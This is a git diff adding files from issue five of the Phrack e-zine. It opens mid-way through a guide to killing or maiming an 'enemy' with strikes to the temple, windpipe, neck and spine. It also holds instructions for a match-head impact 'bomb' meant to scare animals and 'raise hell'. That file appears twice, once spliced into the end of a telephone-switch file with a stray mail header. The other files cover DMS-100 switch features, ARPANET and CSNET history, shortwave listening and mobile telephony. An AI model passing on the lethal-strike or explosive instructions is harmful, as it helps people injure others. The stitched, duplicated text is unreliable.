+bent at the elbows. Keep your knees slightly bent and stand on the balls of
+your feet.
+
+Remember, you always want to maintain this stance when you are not striking at
+the enemy.
+
+Balance
+-------
+It is always important that you keep your balance. If you use the stance I have
+described above, you will never have to worry about it. If by chance you do
+lose your balance even for a second you can kiss your ass goodbye as the enemy
+will probably kill you.
+
+Aggressiveness
+--------------
+Always be aggressive and always attack. Don't just stand back and defend
+yourself against the enemy's strikes as he will end up killing you eventually.
+If you are not aggressive, the enemy will think you are scared and he will have
+an advantage over you.
+
+A great thing to do is yell at the enemy. This will scare the shit out of him
+if you start yelling at him and plus it also allows you to get more oxygen in
+your lungs so you will have more strength.
+
+Natural Weapons
+---------------
+Your natural weapons are as follows: knife edge of either hand, the heel of
+your hands, your fingers folded at the second knuckle, your boot, your elbow,
+your knees, your teeth, your fore finger and second finger forming a "V" shape,
+and your fist. These body parts alone are some of the most powerful weapons you
+can use.
+
+                                      ^*^
+
+Since you now know the basics of fighting, let me list for you the best places
+where you should strike your enemy.
+
+Temple
+------
+A sharp blow to the temple ensures instant death since there is a large artery
+and nerve located close to the skin surface. If you give a medium blow to the
+temple it will cause severe pain and concussion but a hard blow will kill the
+enemy instantly. The best way to strike the temple is with the knife edge of
+your hand or if he is on the ground you can kick him with the toe of your boot.
+
+Eyes
+----
+The eyes are a great place to strike if you can since a good strike in the eyes
+will cause temporary or permanent blindness. To blind the enemy, make a "V"
+shape with your fore finger and second finger and stick them into his eyes
+while keeping your fingers stiff. Also, you can gouge the eyes with your thumb.
+
+Nose
+----
+The nose is another excellent place to attack. Hit the bridge with the knife
+edge of your hand and you will cause breakage, severe pain, temporary blindness
+and even death. Or you can use the palm of your hand to strike upwards and push
+the nose up into his brain. If done hard enough the nose bone will puncture his
+brain and he will die.
+
+Upper Lip
+---------
+The upper lip contains a lot of nerves close to the skin surface so if you
+strike it with the knife edge of your hand it will cause great pain and if
+delivered hard enough he will become unconscious.
+
+Mouth
+-----
+If the enemy is on the ground, use the heel of your boot and strike him on the
+mouth. Since there are a lot of veins and arteries in the teeth there will be a
+lot of blood which will frighten the enemy and he will lose concentration on
+defending other parts of his body.
+
+Chin
+----
+The chin should only be struck with the palm of your hand as you can break your
+fingers on the enemy's chin. Use the palm of your hand and strike the enemy
+with a very strong upward blow. This will cause extreme discomfort.
+
+Adam's Apple
+------------
+Usually the enemy will defend this part of his body well but if you do get the
+chance give it a sharp hit with the knife edge of your hand. If you hit it hard
+enough you will bust his windpipe and he will die. You can also squeeze the
+Adam's Apple between your fingers.
+
+Esophagus
+---------
+If you have a chance to get a hold of his neck, press your thumbs into his
+esophagus (located below the Adam's Apple). Pushing hard will be very painful
+and it will block the oxygen flow to his lungs and he will die quickly.
+
+Neck
+----
+If you give a very strong blow to the base of the neck with the knife edge of
+your hand you will usually break it. However, if it is not hard enough, the
+enemy might just be knocked unconscious so be sure to hit him in the temple or
+twist his neck around to be sure he is dead. The neck is the best place to hit
+someone if you want to be quiet as it is quick and the enemy goes down without
+a word.
+
+Collar Bone
+-----------
+The collar bone is an extremely sensitive part of the body. A sharp blow to it
+with the knife edge of your hand or your elbow gives the enemy excruciating
+pain. Also, digging your finger into the collar bone can bring your enemy to
+his knees.
+
+Shoulder
+--------
+The shoulder is easy dislocated and it takes little strength to do. However, it
+should be done quickly. Grab the enemy's arm and pull it behind his back and
+then jerk it upwards quickly. You should here a popping sound which means you
+have dislocated the enemy's shoulder. There are other methods of doing this but
+this is the easiest.
+
+Armpit
+------
+Although it is hard to get at, the armpit has a large network of nerves. If the
+enemy is on the ground, hold up his arm and then kick him in his pit. This will
+cause severe pain. However, it is not a very common place that will be struck
+in a fight but is good to keep in mind anyways.
+
+Rib Cage
+--------
+A strike to the rib cage with your fingers folded at the second knuckle is
+rather painful and if done hard enough causes severe pain and breakage. Only
+use your fingers folded at the second knuckle since that hurts the most.
+
+Solar Plexus
+------------
+The solar plexus is located on the chest at the little "V" shaped point where
+the rib cage ends. There are a large amount of nerves so a blow with the
+knuckle of your second finger can cause severe pain and even unconsciousness.
+
+Floating Ribs
+-------------
+The floating ribs are the lower ribs located at the front and sides of the
+enemy's body. Use the knife edge of your hand or the heel or toe of your boot.
+The blow will cause pain and will stun the enemy.
+
+Spine
+-----
+A blow to the spine with the heel of your boot can paralyze or kill your enemy.
+The lower spine between the enemy's kidneys is the best place to hit as that is
+the least protected part of the spine. You will only be able to attack the
+spine when your enemy is on the ground or if his back is turned to you.
+
+Kidneys
+-------
+The kidneys have two large nerves that are close to the skin surface. If you
+strike the kidneys hard it will cause death. You can use a fist or the knife
+edge of your hand to hit the kidneys. Or a kick with the heel of your boot will
+work too.
+
+Groin
+-----
+The groin is a good place to strike if you get the chance. Generally, the enemy
+will protect this area the most but if you have a chance, strike it with your
+knee in an upward motion or with your fist. I'm sure you can imagine the pain
+the enemy will get from it.
+
+Tailbone
+--------
+The tailbone which is located above the anus is a very sensitive part of the
+body as a lot of spinal nerves are located there. Use the toe of your boot to
+strike the tailbone. The pain from that is unbelievably severe.
+
+Elbow
+-----
+The elbow is easy to break or dislocate. Pull the enemy's arm behind him and
+with the palm of your hand push his elbow inwards until it either cracks or
+pops. When the enemy has a useless arm, you have a great advantage over him.
+
+Fingers
+-------
+The fingers should be broken because the enemy becomes almost helpless with
+broken fingers. Grab the enemy's arm with one hand and with the other hand push
+the fingers upwards until they snap. It is only necessary to break the first
+two fingers. It is also helpful in breaking a grip.
+
+Knee
+----
+You can destroy the knee by kicking it with the side of your boot in an upward
+motion. This will rip the ligaments and the cartilage. This will cause
+unbelievable pain and make it impossible for the enemy to move around. Once a
+knee has been ruined, you will have a great advantage over the enemy.
+
+Ankle
+-----
+If the enemy is on the ground, get a hold of his ankle and twist it until it
+snaps. This will make it almost impossible for him to walk and he will then be
+easy to kill.
+
+                                      ^*^
+
+Let me talk about some more important things you should remember when you are
+fighting somebody.
+
+Tactics
+-------
+Always try to throw your enemy off balance. You can do this by charging the
+enemy and pretending to strike him. This will make him flinch and lose his
+balance.
+
+Always look for a weak spot and attack it. Whenever he leaves a vulnerable part
+of his body unprotected attack it with all your strength. By doing this, he
+will then try to protect the part of his body that you just struck thus leaving
+even more unprotected parts open.
+
+Use any available object that you can. By this I mean throw sand in his eyes,
+block his strikes by hitting him with a large branch, or any other kind of
+available material that can be used as a weapon against him.
+
+Foul Play
+---------
+In a life or death situation there is no such thing as foul play and there are
+no rules either. Although hitting someone in the groin is considered a cheap
+shot in high school, it is a very effective way of destroying your enemy. Just
+hit him where you can and kick him when he's down. That way, he will never get
+back up again.
+
+                                      ^*^
+
+I have now explained to you the basics of fighting and the best places to
+attack your enemy on his body. Just because you have read this file doesn't
+mean you will be able to go out and kick somebody's ass in. These methods take
+a lot of practice in order to do them properly.
+
+If you enjoyed this file and would like to practice these methods get a partner
+who is also interested in this and work on each type of strike and kick. When
+you first start out, go slowly and remember that these methods are deadly and
+do not require much force to be effective so take it easy on your partner.
+
+Some of you may decide that practicing is not enough and you would like to
+learn more than what I have told you in the above. Well, there are several good
+books with illustrations on this subject which go into much more detail than I
+ever could in this file. The book I used mainly to write this file was "The
+Marine Corps Field Manual on Physical Security". You can get this book through
+a good book store or if you happen to know a marine, he can get you a copy very
+easily.
+
+There are also camps where you can go for 1-2 weeks to learn all sorts of
+things like this such as firing weapons, detailed hand-to-hand combat, doing
+raids on enemies and all sorts of other stuff like that. The instructors that
+teach these programs are well trained and have had years of experience with
+this. However, usually you have to be 18 years or older to get into these
+programs and you have to be very serious about it as well. This is not one of
+those programs where you can say "Time-out, I need to rest." They don't stop
+just to suit you. To get more information about these programs, you can usually
+find out about them in magazines like "Soldier of Fortune" and other magazines
+with similar theme.
+
+                                      ^*^
+
+Well, that's it for now. Perhaps in the future I can discuss the fun stuff like
+fighting people with knives and all the other lethal weapons you can use in a
+fight. If you liked this file, let me know and I will continue on with this
+subject.
+
+_______________________________________________________________________________
+
diff --git a/phrack5/5.txt b/phrack5/5.txt
new file mode 100644
index 0000000..fb02c33
--- /dev/null
+++ b/phrack5/5.txt
@@ -0,0 +1,240 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Five, Phile #5 of 12
+
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+@                                 _  _        _______                         @
+@                                | \/ |      / _____/                         @
+@                                |_||_|etal / /hop                            @
+@                                __________/ /                                @
+@                               /___________/                                 @
+@                             Private/AE/Brewery                              @
+@                                                                             @
+@                                  Presents:                                  @
+@                                                                             @
+@                     Digital Multiplex System (DMS) 100                      @
+@                                     by                                      @
+@                              Knight Lightning                               @
+@                                                                             @
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+
+This file is of course about DMS 100. Expect full length files about the other
+variations of DMS (DMS 200 & 250) coming a later date. Much of the information
+in this file was obtained from manuals acquired from Jester Sluggo.  Note: IBN
+stands for Integrated Business Network.
+_______________________________________________________________________________
+
+DMS-100
+-------
+The DMS-100/IBN consists of electronic business sets and standard telephones,
+data units, and attendant consoles, all located on the customer's premises; and
+DMS-100 digital switching, and support hardware/software, located at the
+telephone company's premises.  Together they create an integrated business
+communications network that provides an unparalleled combination of features
+and benefits.
+
+o  DMS-100/IBN integrates voice and data in a total business communications
+   system.
+
+o  Effectively serves all sizes of organizations, from small businesses using
+   only a few lines, to the most complex network systems with up to 30,000
+   lines.
+
+o  The IBN system monitors and controls its own operations automatically;
+   diagnoses problems; and in some cases, does its own repairs.
+
+o  Fully modular, to meet present needs, and accommodate new features as they
+   are needed.
+
+o  Cost effective: Helps control communications costs through more efficient
+   use of facilities; centralization of attendant service where needed; Call
+   Dial Rerouting (CDR) to control and restrict long-distance calling; and
+   network management.
+
+o  Worry free operation-Northern Telecom's DMS-100 digital switches are backed
+   up by highly trained telephone company personal.
+-------------------------------------------------------------------------------
+Some of the other features that DMS 100 has include:
+
+o  Automatic Route Selection - automatically routes long distance calls over
+   the most economical route available.
+
+o  Station Message Detail Recording - provides a detailed record of long
+   distance charges, including the originating number, time, and duration,
+   authorization code, etc.
+
+o  Direct Inward System Access (DISA) - enables company personnel to use
+   cost-saving company facilities for long distance calling, even from outside
+   the company.
+-------------------------------------------------------------------------------
+                         System Features and Benefits
+-------------------------------------------------------------------------------
+Note: I will list all the features, but I will only go into detail about the
+      important ones.
+
+ATTENDANT CONSOLE
+-----------------
+Call Waiting Lamp
+Loop Keys - There are 6 loop keys, each with its associated source and
+            destination lamp to indicate the calling and called party states.
+Alphanumeric Display
+Multiple Directory Numbers
+Feature Keys - Up to a total of 42.  Some of them could be used for Speed
+               Calling and Paging System.
+Incoming Call Identifier
+Exclude Source/Exclude Destination - privacy keys
+Signal Source/Signal Destination:  Release Source/Release Destination
+
+Console Features
+----------------
+Access to paging                       Call hold
+Call detail entry                      Remote console
+Call Selection                         Console display
+Camp-on                                Automatic recall
+Conference - 6 port                    Two-way splitting
+Non-delayed operation                  Attendant transfer
+Locked loop operation                  Busy verification of lines
+Manual and automatic hold              Multiple console operation
+Busy verification of trunks            Switched loop operation
+Trunk group busy indication            Uniform call distribution form queue
+Multiple listed directory numbers      Control of trunk group access
+Secrecy                                Night service
+Serial call                            Speed calling
+Lockout                                Delayed operation
+Position busy                          Interposition calling
+Through dialing
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+ELECTRONIC BUSINESS SETS
+------------------------
+LCD Indicators
+Call Forwarding
+Automatic Line
+Call Pick-up
+Ring Again - automatically redials busy numbers until they are free
+Multiple Directory Numbers
+Intercom
+Speed Call
+Call Transfer/Conference
+On-Hook Dialing
+
+Additional Programmable Features
+--------------------------------
+Automatic Hold
+Listen-on Hold
+Multiple Appearance Directory Numbers (MADN)
+ - Single Call Arrangement
+ - Multiple Call Arrangement
+Privacy Release
+Tone Ringing with Volume Control
+End-to-End Signaling
+Call Park
+Make Set Busy
+Malicious Call Trace
+Busy Override
+Attendant Recall
+Call Waiting
+Stored Number Redial
+Private Business Line
+32 Character Alphanumeric Display
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+DATA UNIT
+---------
+The DMS-100/IBN Data Unit makes information accessing as easy to learn and to
+use as the telephone.  It can be used as a "Standalone" or attached to the
+Business Set or standard telephone, for integrated voice and data telephone
+telecommunications.
+
+Transmits over simple 2-wire loops, at speeds of up to 56 kb/s, using Northern
+Telecom's proprietary Time Compression Multiplexing technology; Compatible with
+existing computer and data terminal equipment, and is available in different
+low-speed and high-speed models, to suit existing terminal capacity.
+
+Benefits
+--------
+o  Combines with Business Set or standard telephone, to provide integrated
+   voice/data communications.
+
+o  Your data unit and telephone can operate together simultaneously or totally
+   independent of each other.
+
+o  Fully digitalized, eliminating bulky analog modems.
+
+o  Ring Again (constant redial on busy numbers)
+
+o  Speed Calling
+-------------------------------------------------------------------------------
+For further information contact:
+
+Digital Switching Systems Sales
+Northern Telecom Inc.
+P.O. Box 13010
+4001 East Chapel Hill -- Nelson Highway
+Research Triangle Park
+North Carolina 27709
+Tel: (919) 549-5000
+
+Switching Group Sales, Department S-70
+Northern Telecom Canada Limited
+8200 Dixie Road, P.O. Box 3000
+Brampton, Ontario
+L6V 2M6
+Tel: (416) 451-9150
+_______________________________________________________________________________
+
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Five, Phile #6 of 12
+
+  +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+  |\_______________________ A new Anarchy toy!____________________________/ |
+  |_________________________________________________________________________|
+  \________________________________________________________________________/
+
+                   <otherwise known as "Know Your Hardware">
+
+   Written and typed by the Leftist.
+   ---------------------------------
+
+ This new "bomb" isn't really all that destructive, although I would hate to
+be nailed in the head by a flying piece of it.  Use it to scare dogs, and to
+just raise hell.
+
+
+Materials: You will need- 1 nut, fairly large in size, 2 bolts, both the same
+size, which will both be the correct size to fit in the nut.  You will also
+need a box of strike-anywhere wooden kitchen matches.
+
+
+
+Design: Ok, you got all your stuff?  Let's begin.  Take one of the bolts and
+the nut and screw it about 1/4 the way onto the nut.  It should look like this
+<sort of>
+                        ___                       |---|
+                        |  |______________________|   |
+                        |   _|_|___|__|__|__|_|___|   |
+                        |__|                      |---|
+                                  bolt ^               ^
+                                       |           nut |
+
+
+ Ok, take the matches, and there should be a 2 colored tip on the end.  Well,
+cut the top layer off (this should be done with a razor blade) carefully, as to
+not set the matches off.  Ok.  Got that?  Good, now, take about, oh, four or
+five heads, or if you're feeling kind of dangerous, and can fit them, try six.
+Put the heads <white part> into the space that is between the other side of the
+bolt and the nut.  Now, carefully, take the other bolt and screw it down kind
+of tight onto the other side.  You now should have the 2 bolts connected by the
+nut, and the matches in between this whole hardware contraption.
+
+Now what??!?
+
+Take this thing, and throw it at something solid, and hard, like the street,
+for instance, and be sure you throw it kinda hard, and kinda far.  These can be
+a lot of fun, and only take a second to build.
+Received: (from LISTSERV@PSUVM for TK0EEE1@UCLAMAIL via NJE)
+         (LISTSE00-7268;     153 LINES); Tue, 19 Dec 89 17:45:31 CST
+Date:    Tue, 19 Dec 89 17:45 CST
+To:      TK0EEE1
+From:    LISTSERV@PSUVM
+
+
diff --git a/phrack5/6.txt b/phrack5/6.txt
new file mode 100644
index 0000000..34b8a1a
--- /dev/null
+++ b/phrack5/6.txt
@@ -0,0 +1,56 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Five, Phile #6 of 12
+
+  +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+  |\_______________________ A new Anarchy toy!____________________________/ |
+  |_________________________________________________________________________|
+  \________________________________________________________________________/
+
+                   <otherwise known as "Know Your Hardware">
+
+   Written and typed by the Leftist.
+   ---------------------------------
+
+ This new "bomb" isn't really all that destructive, although I would hate to
+be nailed in the head by a flying piece of it.  Use it to scare dogs, and to
+just raise hell.
+
+
+Materials: You will need- 1 nut, fairly large in size, 2 bolts, both the same
+size, which will both be the correct size to fit in the nut.  You will also
+need a box of strike-anywhere wooden kitchen matches.
+
+
+
+Design: Ok, you got all your stuff?  Let's begin.  Take one of the bolts and
+the nut and screw it about 1/4 the way onto the nut.  It should look like this
+<sort of>
+                        ___                       |---|
+                        |  |______________________|   |
+                        |   _|_|___|__|__|__|_|___|   |
+                        |__|                      |---|
+                                  bolt ^               ^
+                                       |           nut |
+
+
+ Ok, take the matches, and there should be a 2 colored tip on the end.  Well,
+cut the top layer off (this should be done with a razor blade) carefully, as to
+not set the matches off.  Ok.  Got that?  Good, now, take about, oh, four or
+five heads, or if you're feeling kind of dangerous, and can fit them, try six.
+Put the heads <white part> into the space that is between the other side of the
+bolt and the nut.  Now, carefully, take the other bolt and screw it down kind
+of tight onto the other side.  You now should have the 2 bolts connected by the
+nut, and the matches in between this whole hardware contraption.
+
+Now what??!?
+
+Take this thing, and throw it at something solid, and hard, like the street,
+for instance, and be sure you throw it kinda hard, and kinda far.  These can be
+a lot of fun, and only take a second to build.
+Received: (from LISTSERV@PSUVM for TK0EEE1@UCLAMAIL via NJE)
+         (LISTSE00-7268;     153 LINES); Tue, 19 Dec 89 17:45:31 CST
+Date:    Tue, 19 Dec 89 17:45 CST
+To:      TK0EEE1
+From:    LISTSERV@PSUVM
+
diff --git a/phrack5/7.txt b/phrack5/7.txt
new file mode 100644
index 0000000..dbb86dc
--- /dev/null
+++ b/phrack5/7.txt
@@ -0,0 +1,154 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Five, Phile #7 of 12
+
+                            Jester Sluggo presents
+                                 an insight on
+                              Wide-Area Networks
+                                    Part 1
+
+Part 1 contains information on ARPANET and CSNET.
+Part 2 contains information on BITNET, MFENET, UUCP and USENET.
+It is best if you read both files to better understand each other.
+
+     These files will cover general information on wide-area networks, (I.E.
+ARPANET, CSNET, BITNET, MFENET, UUCP and USENET), but may contain information
+in relationship with other networks not emphasized in these files. These files
+are NOT a hacker's tutorial/guide on these systems.
+
+                                    ARPANET
+                                    ~~~~~~~
+     ARPANET. The ARPANET, which is a major component of the NSFnet [National
+Science Foundation Network], began in 1969 as an R&D project managed by DARPA
+[Dept. of Defense Advanced Research Projects Agency]. ARPANET was an experiment
+in resource sharing, and provided survivable (multiply connected), high
+bandwidth (56 Kilobits per second) communications links between major existing
+computational resources and computer users in academic, industrial, and
+government research laboratories.  ARPANET is managed and funded by by the DCA
+[Defense Communications Agency] with user services provided by a network
+information center at SRI International.
+     ARPANET served as a test for the development of advanced network protocols
+including the TCP-IP protocol suite introduced in 1981.  TCP-IP and
+particularly IP, the internet protocol, introduced the idea of inter-
+networking -- allowing networks of different technologies and connection
+protocols to be linked together while providing a unified internetwork
+addressing scheme and a common set of transport of application protocols. This
+development allowed networks of computers and workstations to be connected to
+the ARPANET, rather than just single-host computers.  TCP-IP remain the most
+available and advanced, non-vendor-specific, networking protocols and have
+strongly influenced the current international standards of activity.  TCP-IP
+provide a variety of application services, including remote logon (Telnet),
+file transfer (FTP), and electronic mail (SMTP and RFC822).
+     ARPANET technology was so successful that in 1982, the Dept. of Defense
+(DOD) abandoned their AUTODIN II network project and adopted ARPANET technology
+for the Dept. of Defense Data Network (DDN).  The current MILNET, which was
+split form the original ARPANET in 1983, is the operational, unclassified
+network component of the DDN, while ARPANET remains an advanced network R&D
+tested for DARPA.  In practice, ARPANET has also been an operational network
+supporting DOD, DOE [Dept. of Energy], and some NSF-sponsored computer science
+researchers.  This community has come to depend on the availability of the
+network.  Until the advent of NSFnet, access to ARPANET was restricted to this
+community.
+     As an operational network in the scientific and engineering research
+community, and with the increasing availability of affordable super-
+minicomputers, ARPANET was used less as a tool for sharing remote computational
+resources than it was for sharing information.  The major lesson from the
+ARPANET experience is that information sharing is a key benefit of computer
+networking.  Indeed it may be argued that many major advances in computer
+systems and artificial intelligence are the direct result of the enhanced
+collaboration made possible by ARPANET.
+     However, ARPANET also had the negative effect of creating a have--have not
+situation in experimental computer research.  Scientists and engineers carrying
+out such research at institutions other than the twenty or so ARPANET sites
+were at a clear disadvantage in accessing pertinent technical information and
+in attracting faculty and students.
+     In October 1985, NSF and DARPA, with DOD support, signed a memorandum of
+agreement to expand the ARPANET to allow NSF supercomputer users to use ARPANET
+to access the NSF supercomputer centers and to communicate with each other.
+The immediate effect of this agreement was to allow all NSF supercomputer users
+on campuses with an existing ARPANET connection to use ARPANET.  In addition,
+the NSF supercomputer resource centers at the University of Illinois and
+Cornell University are connected to ARPANET. In general, the existing ARPANET
+connections are in departments of computer science or electrical engineering
+and are not readily accessible by other researchers.  However, DARPA has
+requested that the campus ARPANET coordinators facilitate access by relevant
+NSF researchers.
+     As part of the NSFnet initiative, a number of universities have requested
+connection to ARPANET.  Each of these campuses has undertaken to establish a
+campus network gateway accessible to all due course, be able to use the ARPANET
+to access the NSF supercomputer centers, from within their own local computing
+environment.  Additional requests for connection to the ARPANET are being
+considered by NSF.
+
+                                     CSNET
+                                     ~~~~~
+CSNET.  Establishment of a network for computer science research was first
+suggested in 1974, by the NSF advisory committee for computer science.  The
+objective of the network would be to support collaboration among researchers,
+provide research sharing, and, in particular, support isolated researchers in
+the smaller universities.
+     In the spring of 1980, CSNET [Computer Science Network], was defined and
+proposed to NSF as a logical network made up of several physical networks of
+various power, performance, and cost.  NSF responded with a five year contract
+for development of the network under the condition that CSNET was to be
+financially self-supporting by 1986.  Initially CSNET was a network with five
+major components -- ARPANET, Phonenet (a telephone based message relaying
+service), X25Net (suppose for the TCP-IP Protocol suite over X.25-based public
+data networks), a public host (a centralized mail service), and a name server
+(an online database of CSNET users to support transparent mail services).  The
+common service provided across all these networks is electronic mail, which is
+integrated at a special service host, which acts as an electronic mail relay
+between the component networks. Thus CSNET users can send electronic mail to
+all ARPANET users and vice-versa.  CSNET, with DARPA support, installed
+ARPANET connections at the CSNET development sites at the universities of
+Delaware and Wisconsin and Purdue University.
+     In 1981, Bolt, Beranek, and Newman (BBN) contracted to provide technical
+and user services and to operate the CSNET Coordination and Information Center.
+In 1983, general management of CSNET was assumed by UCAR [the Univ. Corporation
+for Atmospheric Research], with a subcontract to BBN.  Since then, CSNET has
+grown rapidly and is currently an independent, financially stable, and
+professionally managed service to the computer research community.  However,
+the momentum created by CSNET's initial success caused the broad community
+support it now enjoys.  More than 165 university, industrial, and government
+computer research groups now belong to CSNET.
+     A number of lessons may be learned from the CSNET experience.
+1)  The network is now financially self-sufficient, showing that a research is
+willing to pay for the benefits of a networking service. (Users pay usage
+charges plus membership fees ranging from $2000 for small computer science
+departments to $30,000 for the larger industrial members.)
+2)  While considerable benefits are available to researchers from simple
+electronic mail and mailing list services -- the Phonenet service -- most
+researchers want the much higher level of performance and service provided by
+the ARPANET.
+3)  Providing a customer support and information service is crucial to the
+success of a network, even (or perhaps especially) when the users are
+themselves sophisticated computer science professionals.  Lessons from the
+CSNET experience will provide valuable input to the design, implementation,
+provision of user services, and operation and management of NSFnet, and, in
+particular, to the development of the appropriate funding model for NSFnet.
+     CSNET, with support from the NSFnet program, is now developing the CYPRESS
+project which is examining ways in which the level of CSNET service may be
+improved, at low cost, to research departments.  CYPRESS will use the DARPA
+protocol suite and provide ARPANET-like service on low-speed 9600-bit-per-
+second leased line telephone links.  The network will use a nearest neighbor
+topology, modeled on BITNET, while providing a higher level of service to users
+and a higher level of interoperability with the ARPANET. The CYPRESS project is
+designed to replace or supplement CSNET use of the X.25 public networks, which
+has proved excessively expensive.  This approach may also be used to provide a
+low-cost connection to NSFnet for smaller campuses.
+
+/
+\
+/ luggo !!
+
+Please give full credit for references to the following:
+Dennis M. Jennings, Lawrence H. Landweber, Ira H. Fuchs, David J. Faber, and W.
+Richards Adrion.
+
+Any questions, comments or Sluggestions can be emailed to me at Metal Shop,
+or sent via snailmail to the following address until 12-31-1986:
+
+                                   J. Sluggo
+                                  P.O. Box 93
+                          East Grand Forks, MN  56721
+
diff --git a/phrack5/8.txt b/phrack5/8.txt
new file mode 100644
index 0000000..8c2c732
--- /dev/null
+++ b/phrack5/8.txt
@@ -0,0 +1,98 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Five, Phile #8 of 12
+
+                         ----------------------------
+                         - Short-Wave Radio Hacking -
+                         ----------------------------
+                                      by
+
+                                      The Seker
+
+    Every day, tons of information is exchanged over the air waves.  I have
+found news agencies, military computers, businesses, and even hacks.
+    The standard method of exchange is called RTTY (Radio Teletype).  It
+usually is used at 66/7 words per min. Instead of using ASCII, Baudot, a 5 bit
+character set is more widely used. There are many variations of it in use also.
+
+    There are many other types of transmission standards besides RTTY that are
+commonly used.  A few of the known:
+
+    FAX (Facsimile)
+
+    Helshcrieber- it's used to transmit pictogram-type alphabets (i.e.
+       Chinese, Jap, etc.) instead of the American letters.
+
+    SSTV- is similiar to Viewdata. Used for transmitting high-resolution
+       pictures mixed with text.
+
+    To start, you'll need to buy (card) a receiver (with a coverage of no less
+than 500 kHz-30 MHz and a resolution greater than 100 Hz) and a high quality
+antenna.  These can usually be found at electronics stores.  You will also need
+to get an interface and some RTTY software for your particuliar computer.  Look
+in magazines like 'Amatuer Radio' or 'Ham Radio Today' for more information on
+that shit.  Another good place to check is a CB store.
+
+
+
+  NEWS AGENCIES-
+
+    From these you can find all sorts of crap.  You may even intercept a story
+being sent to the presses. They tend to operate at 66/7 words a minute (50
+baud).  A few of the more common 'fixed' bands they transmit over are:
+
+  at kHz:
+
+    3155-3400      3950-4063
+    9040-9500      12050-12330
+   13800-14000     15600-16360
+   19800-19990     25210-25550
+
+
+    An easy way to tell if you have located a news agency is by some lame
+transmission being continuosly repeated.
+
+                      i.e. 'RYRYRYRYRYRYRYRYRYRYRY' etc.
+
+    This is done so they can keep their channels opened for reception.
+
+
+
+  CONFERENCES-
+
+    Another thing I found interesting was the channels that the amatuers
+congregated around.  I frequently ran into people from foreign countries that
+couldn't even speak English. I even ran into other hackers from all over!
+    A few of the more popular spots that amatuers hang out are:
+
+  at kHz:
+
+    3590  14090  21090  28090
+
+  at MHz:
+
+    432.600  433.300
+
+  at VHF/UHF:
+
+    144.600  145.300
+
+
+
+  PACKET RADIO-
+
+    A new development in radio transmission is the packet radio.  From what
+I've seen, it's just like digital packet switching networks, i.e. Compuserve,
+Telenet, Tymnet, etc.; except slower.
+    In fact, Compuserve has been researching a way to transmit its services
+cheaply.
+
+
+
+                                     --tS
+
+                     This has been written exclusively for
+
+                           ---Metal Shop Private---
+
+
diff --git a/phrack5/9.txt b/phrack5/9.txt
new file mode 100644
index 0000000..3b3929c
--- /dev/null
+++ b/phrack5/9.txt
@@ -0,0 +1,198 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Five, Phile #9 of 12
+
+                        Mobile Telephone Communications
+
+                              By Phantom Phreaker
+
+                           Presented by The Alliance
+                                 (618)667-3825
+
+
+ Mobile telephone communications is not the same thing as Cellular. Mobile
+telephone service is not as advanced as Cellular, and not as efficient. Mobile
+telephone service limits the number of customers sharply, while Cellular is
+designed to solve the problems of Mobile telephone service.
+
+ The signals for Mobile communications are sent by high-power transmitters and
+antennas that provide an area of approx. 20-30 miles with service.
+
+ A base unit of a Mobile communications system transmits and receives on
+different frequencies at the same time. Typical power for the radio base
+station transmitter is 200-250 watts.
+
+ Mobile telephone facilities tie in with the normal fixed-position telephone
+system, however base units can be owned by a Radio Common Carrier (RCC). RCCs
+running mobile telephone systems are charged by the telephone company for use
+of the normal phone system.
+
+DIAGRAM:
+--------
+                      ^-Base antenna    Mobile unit
+                      |                    |
+                      |- - - - - - - - - /-- --\
+                      |     ^Signal^    | (Car) |
+                   ---------------------------------------
+                      ^-------<-20-30 Miles->---|
+                      ^                         |-From
+                   /===========\                | mobile
+                   |Receiver/  |                | antenna
+                   |Transmitter|         =============
+                   /===========\         |Receiver/  | |-|
+                   |Control    |         |Transmitter|-|*|
+                   |Terminal   |         ============= |-|
+                   \===========/                        ^
+                        |                           Handset
+                        | <-Telephone
+                        | <-Land line
+                        |
+                    =======                =======
+                    | C.O.|                | C.O.|---[-*-]
+                    =======                =======    |*|
+                        |                      |      -----
+                        |                      |      Fixed
+                    =========              =========  Phone
+                    |Switch |--------------|Switch |
+                    |Network| Transmission |Network|
+                    =========     Link     =========
+
+                   ---------------------------------------
+(Above diagram from 'Understanding Telephone Electronics' chapter 10.)
+
+ As you can see from the above diagram, calls placed from the Fixed position
+telephone are routed through a Central Office as normal, through a Switch
+Network, to another Switch network, and to another CO. From the second CO
+(nearest to the Mobile unit), the signals are sent on a telephone line to the
+control terminal, to the receiver, then to the base unit (antenna). From the
+base unit, the radio signals are sent to the site of the mobile telephone.
+ Calls from the mobile telephone operate in the same manner. An idle radio
+channel is selected (like seizure of a trunk for a LD call) and the signals are
+sent over the mobile network.
+ If no channel is available for use, then a busy indication is triggered
+(similar to a re-order). If a channel is available, the customer will be
+prompted with a dial tone, similar to normal fixed-position telephone service.
+ The area that this would work in is called the subscriber's home area. When a
+mobile telephone service subscriber leaves the service area, he is then
+referred to as a Roamer. Since the mobile unit is out of the service area,
+special preparations have to be made to continue communications to/from that
+mobile unit.
+
+SIGNALLING
+----------
+ Mobile signalling tones are selected (like touch tones) to avoid possible
+reproduction of the signalling tone on the voice link, to cause a signalling
+mistake. The IMTS (Improved Mobile Telephone Service) uses in band signalling
+of tones from 1300Hz-2200Hz. Another method of signalling is the MTS (Mobile
+Telephone System). MTS is older than IMTS, and MTS uses in band signalling of
+tones from 600Hz-1500Hz, and some use 2805 Hz in manual operation.
+
+CALL COMPLETION
+---------------
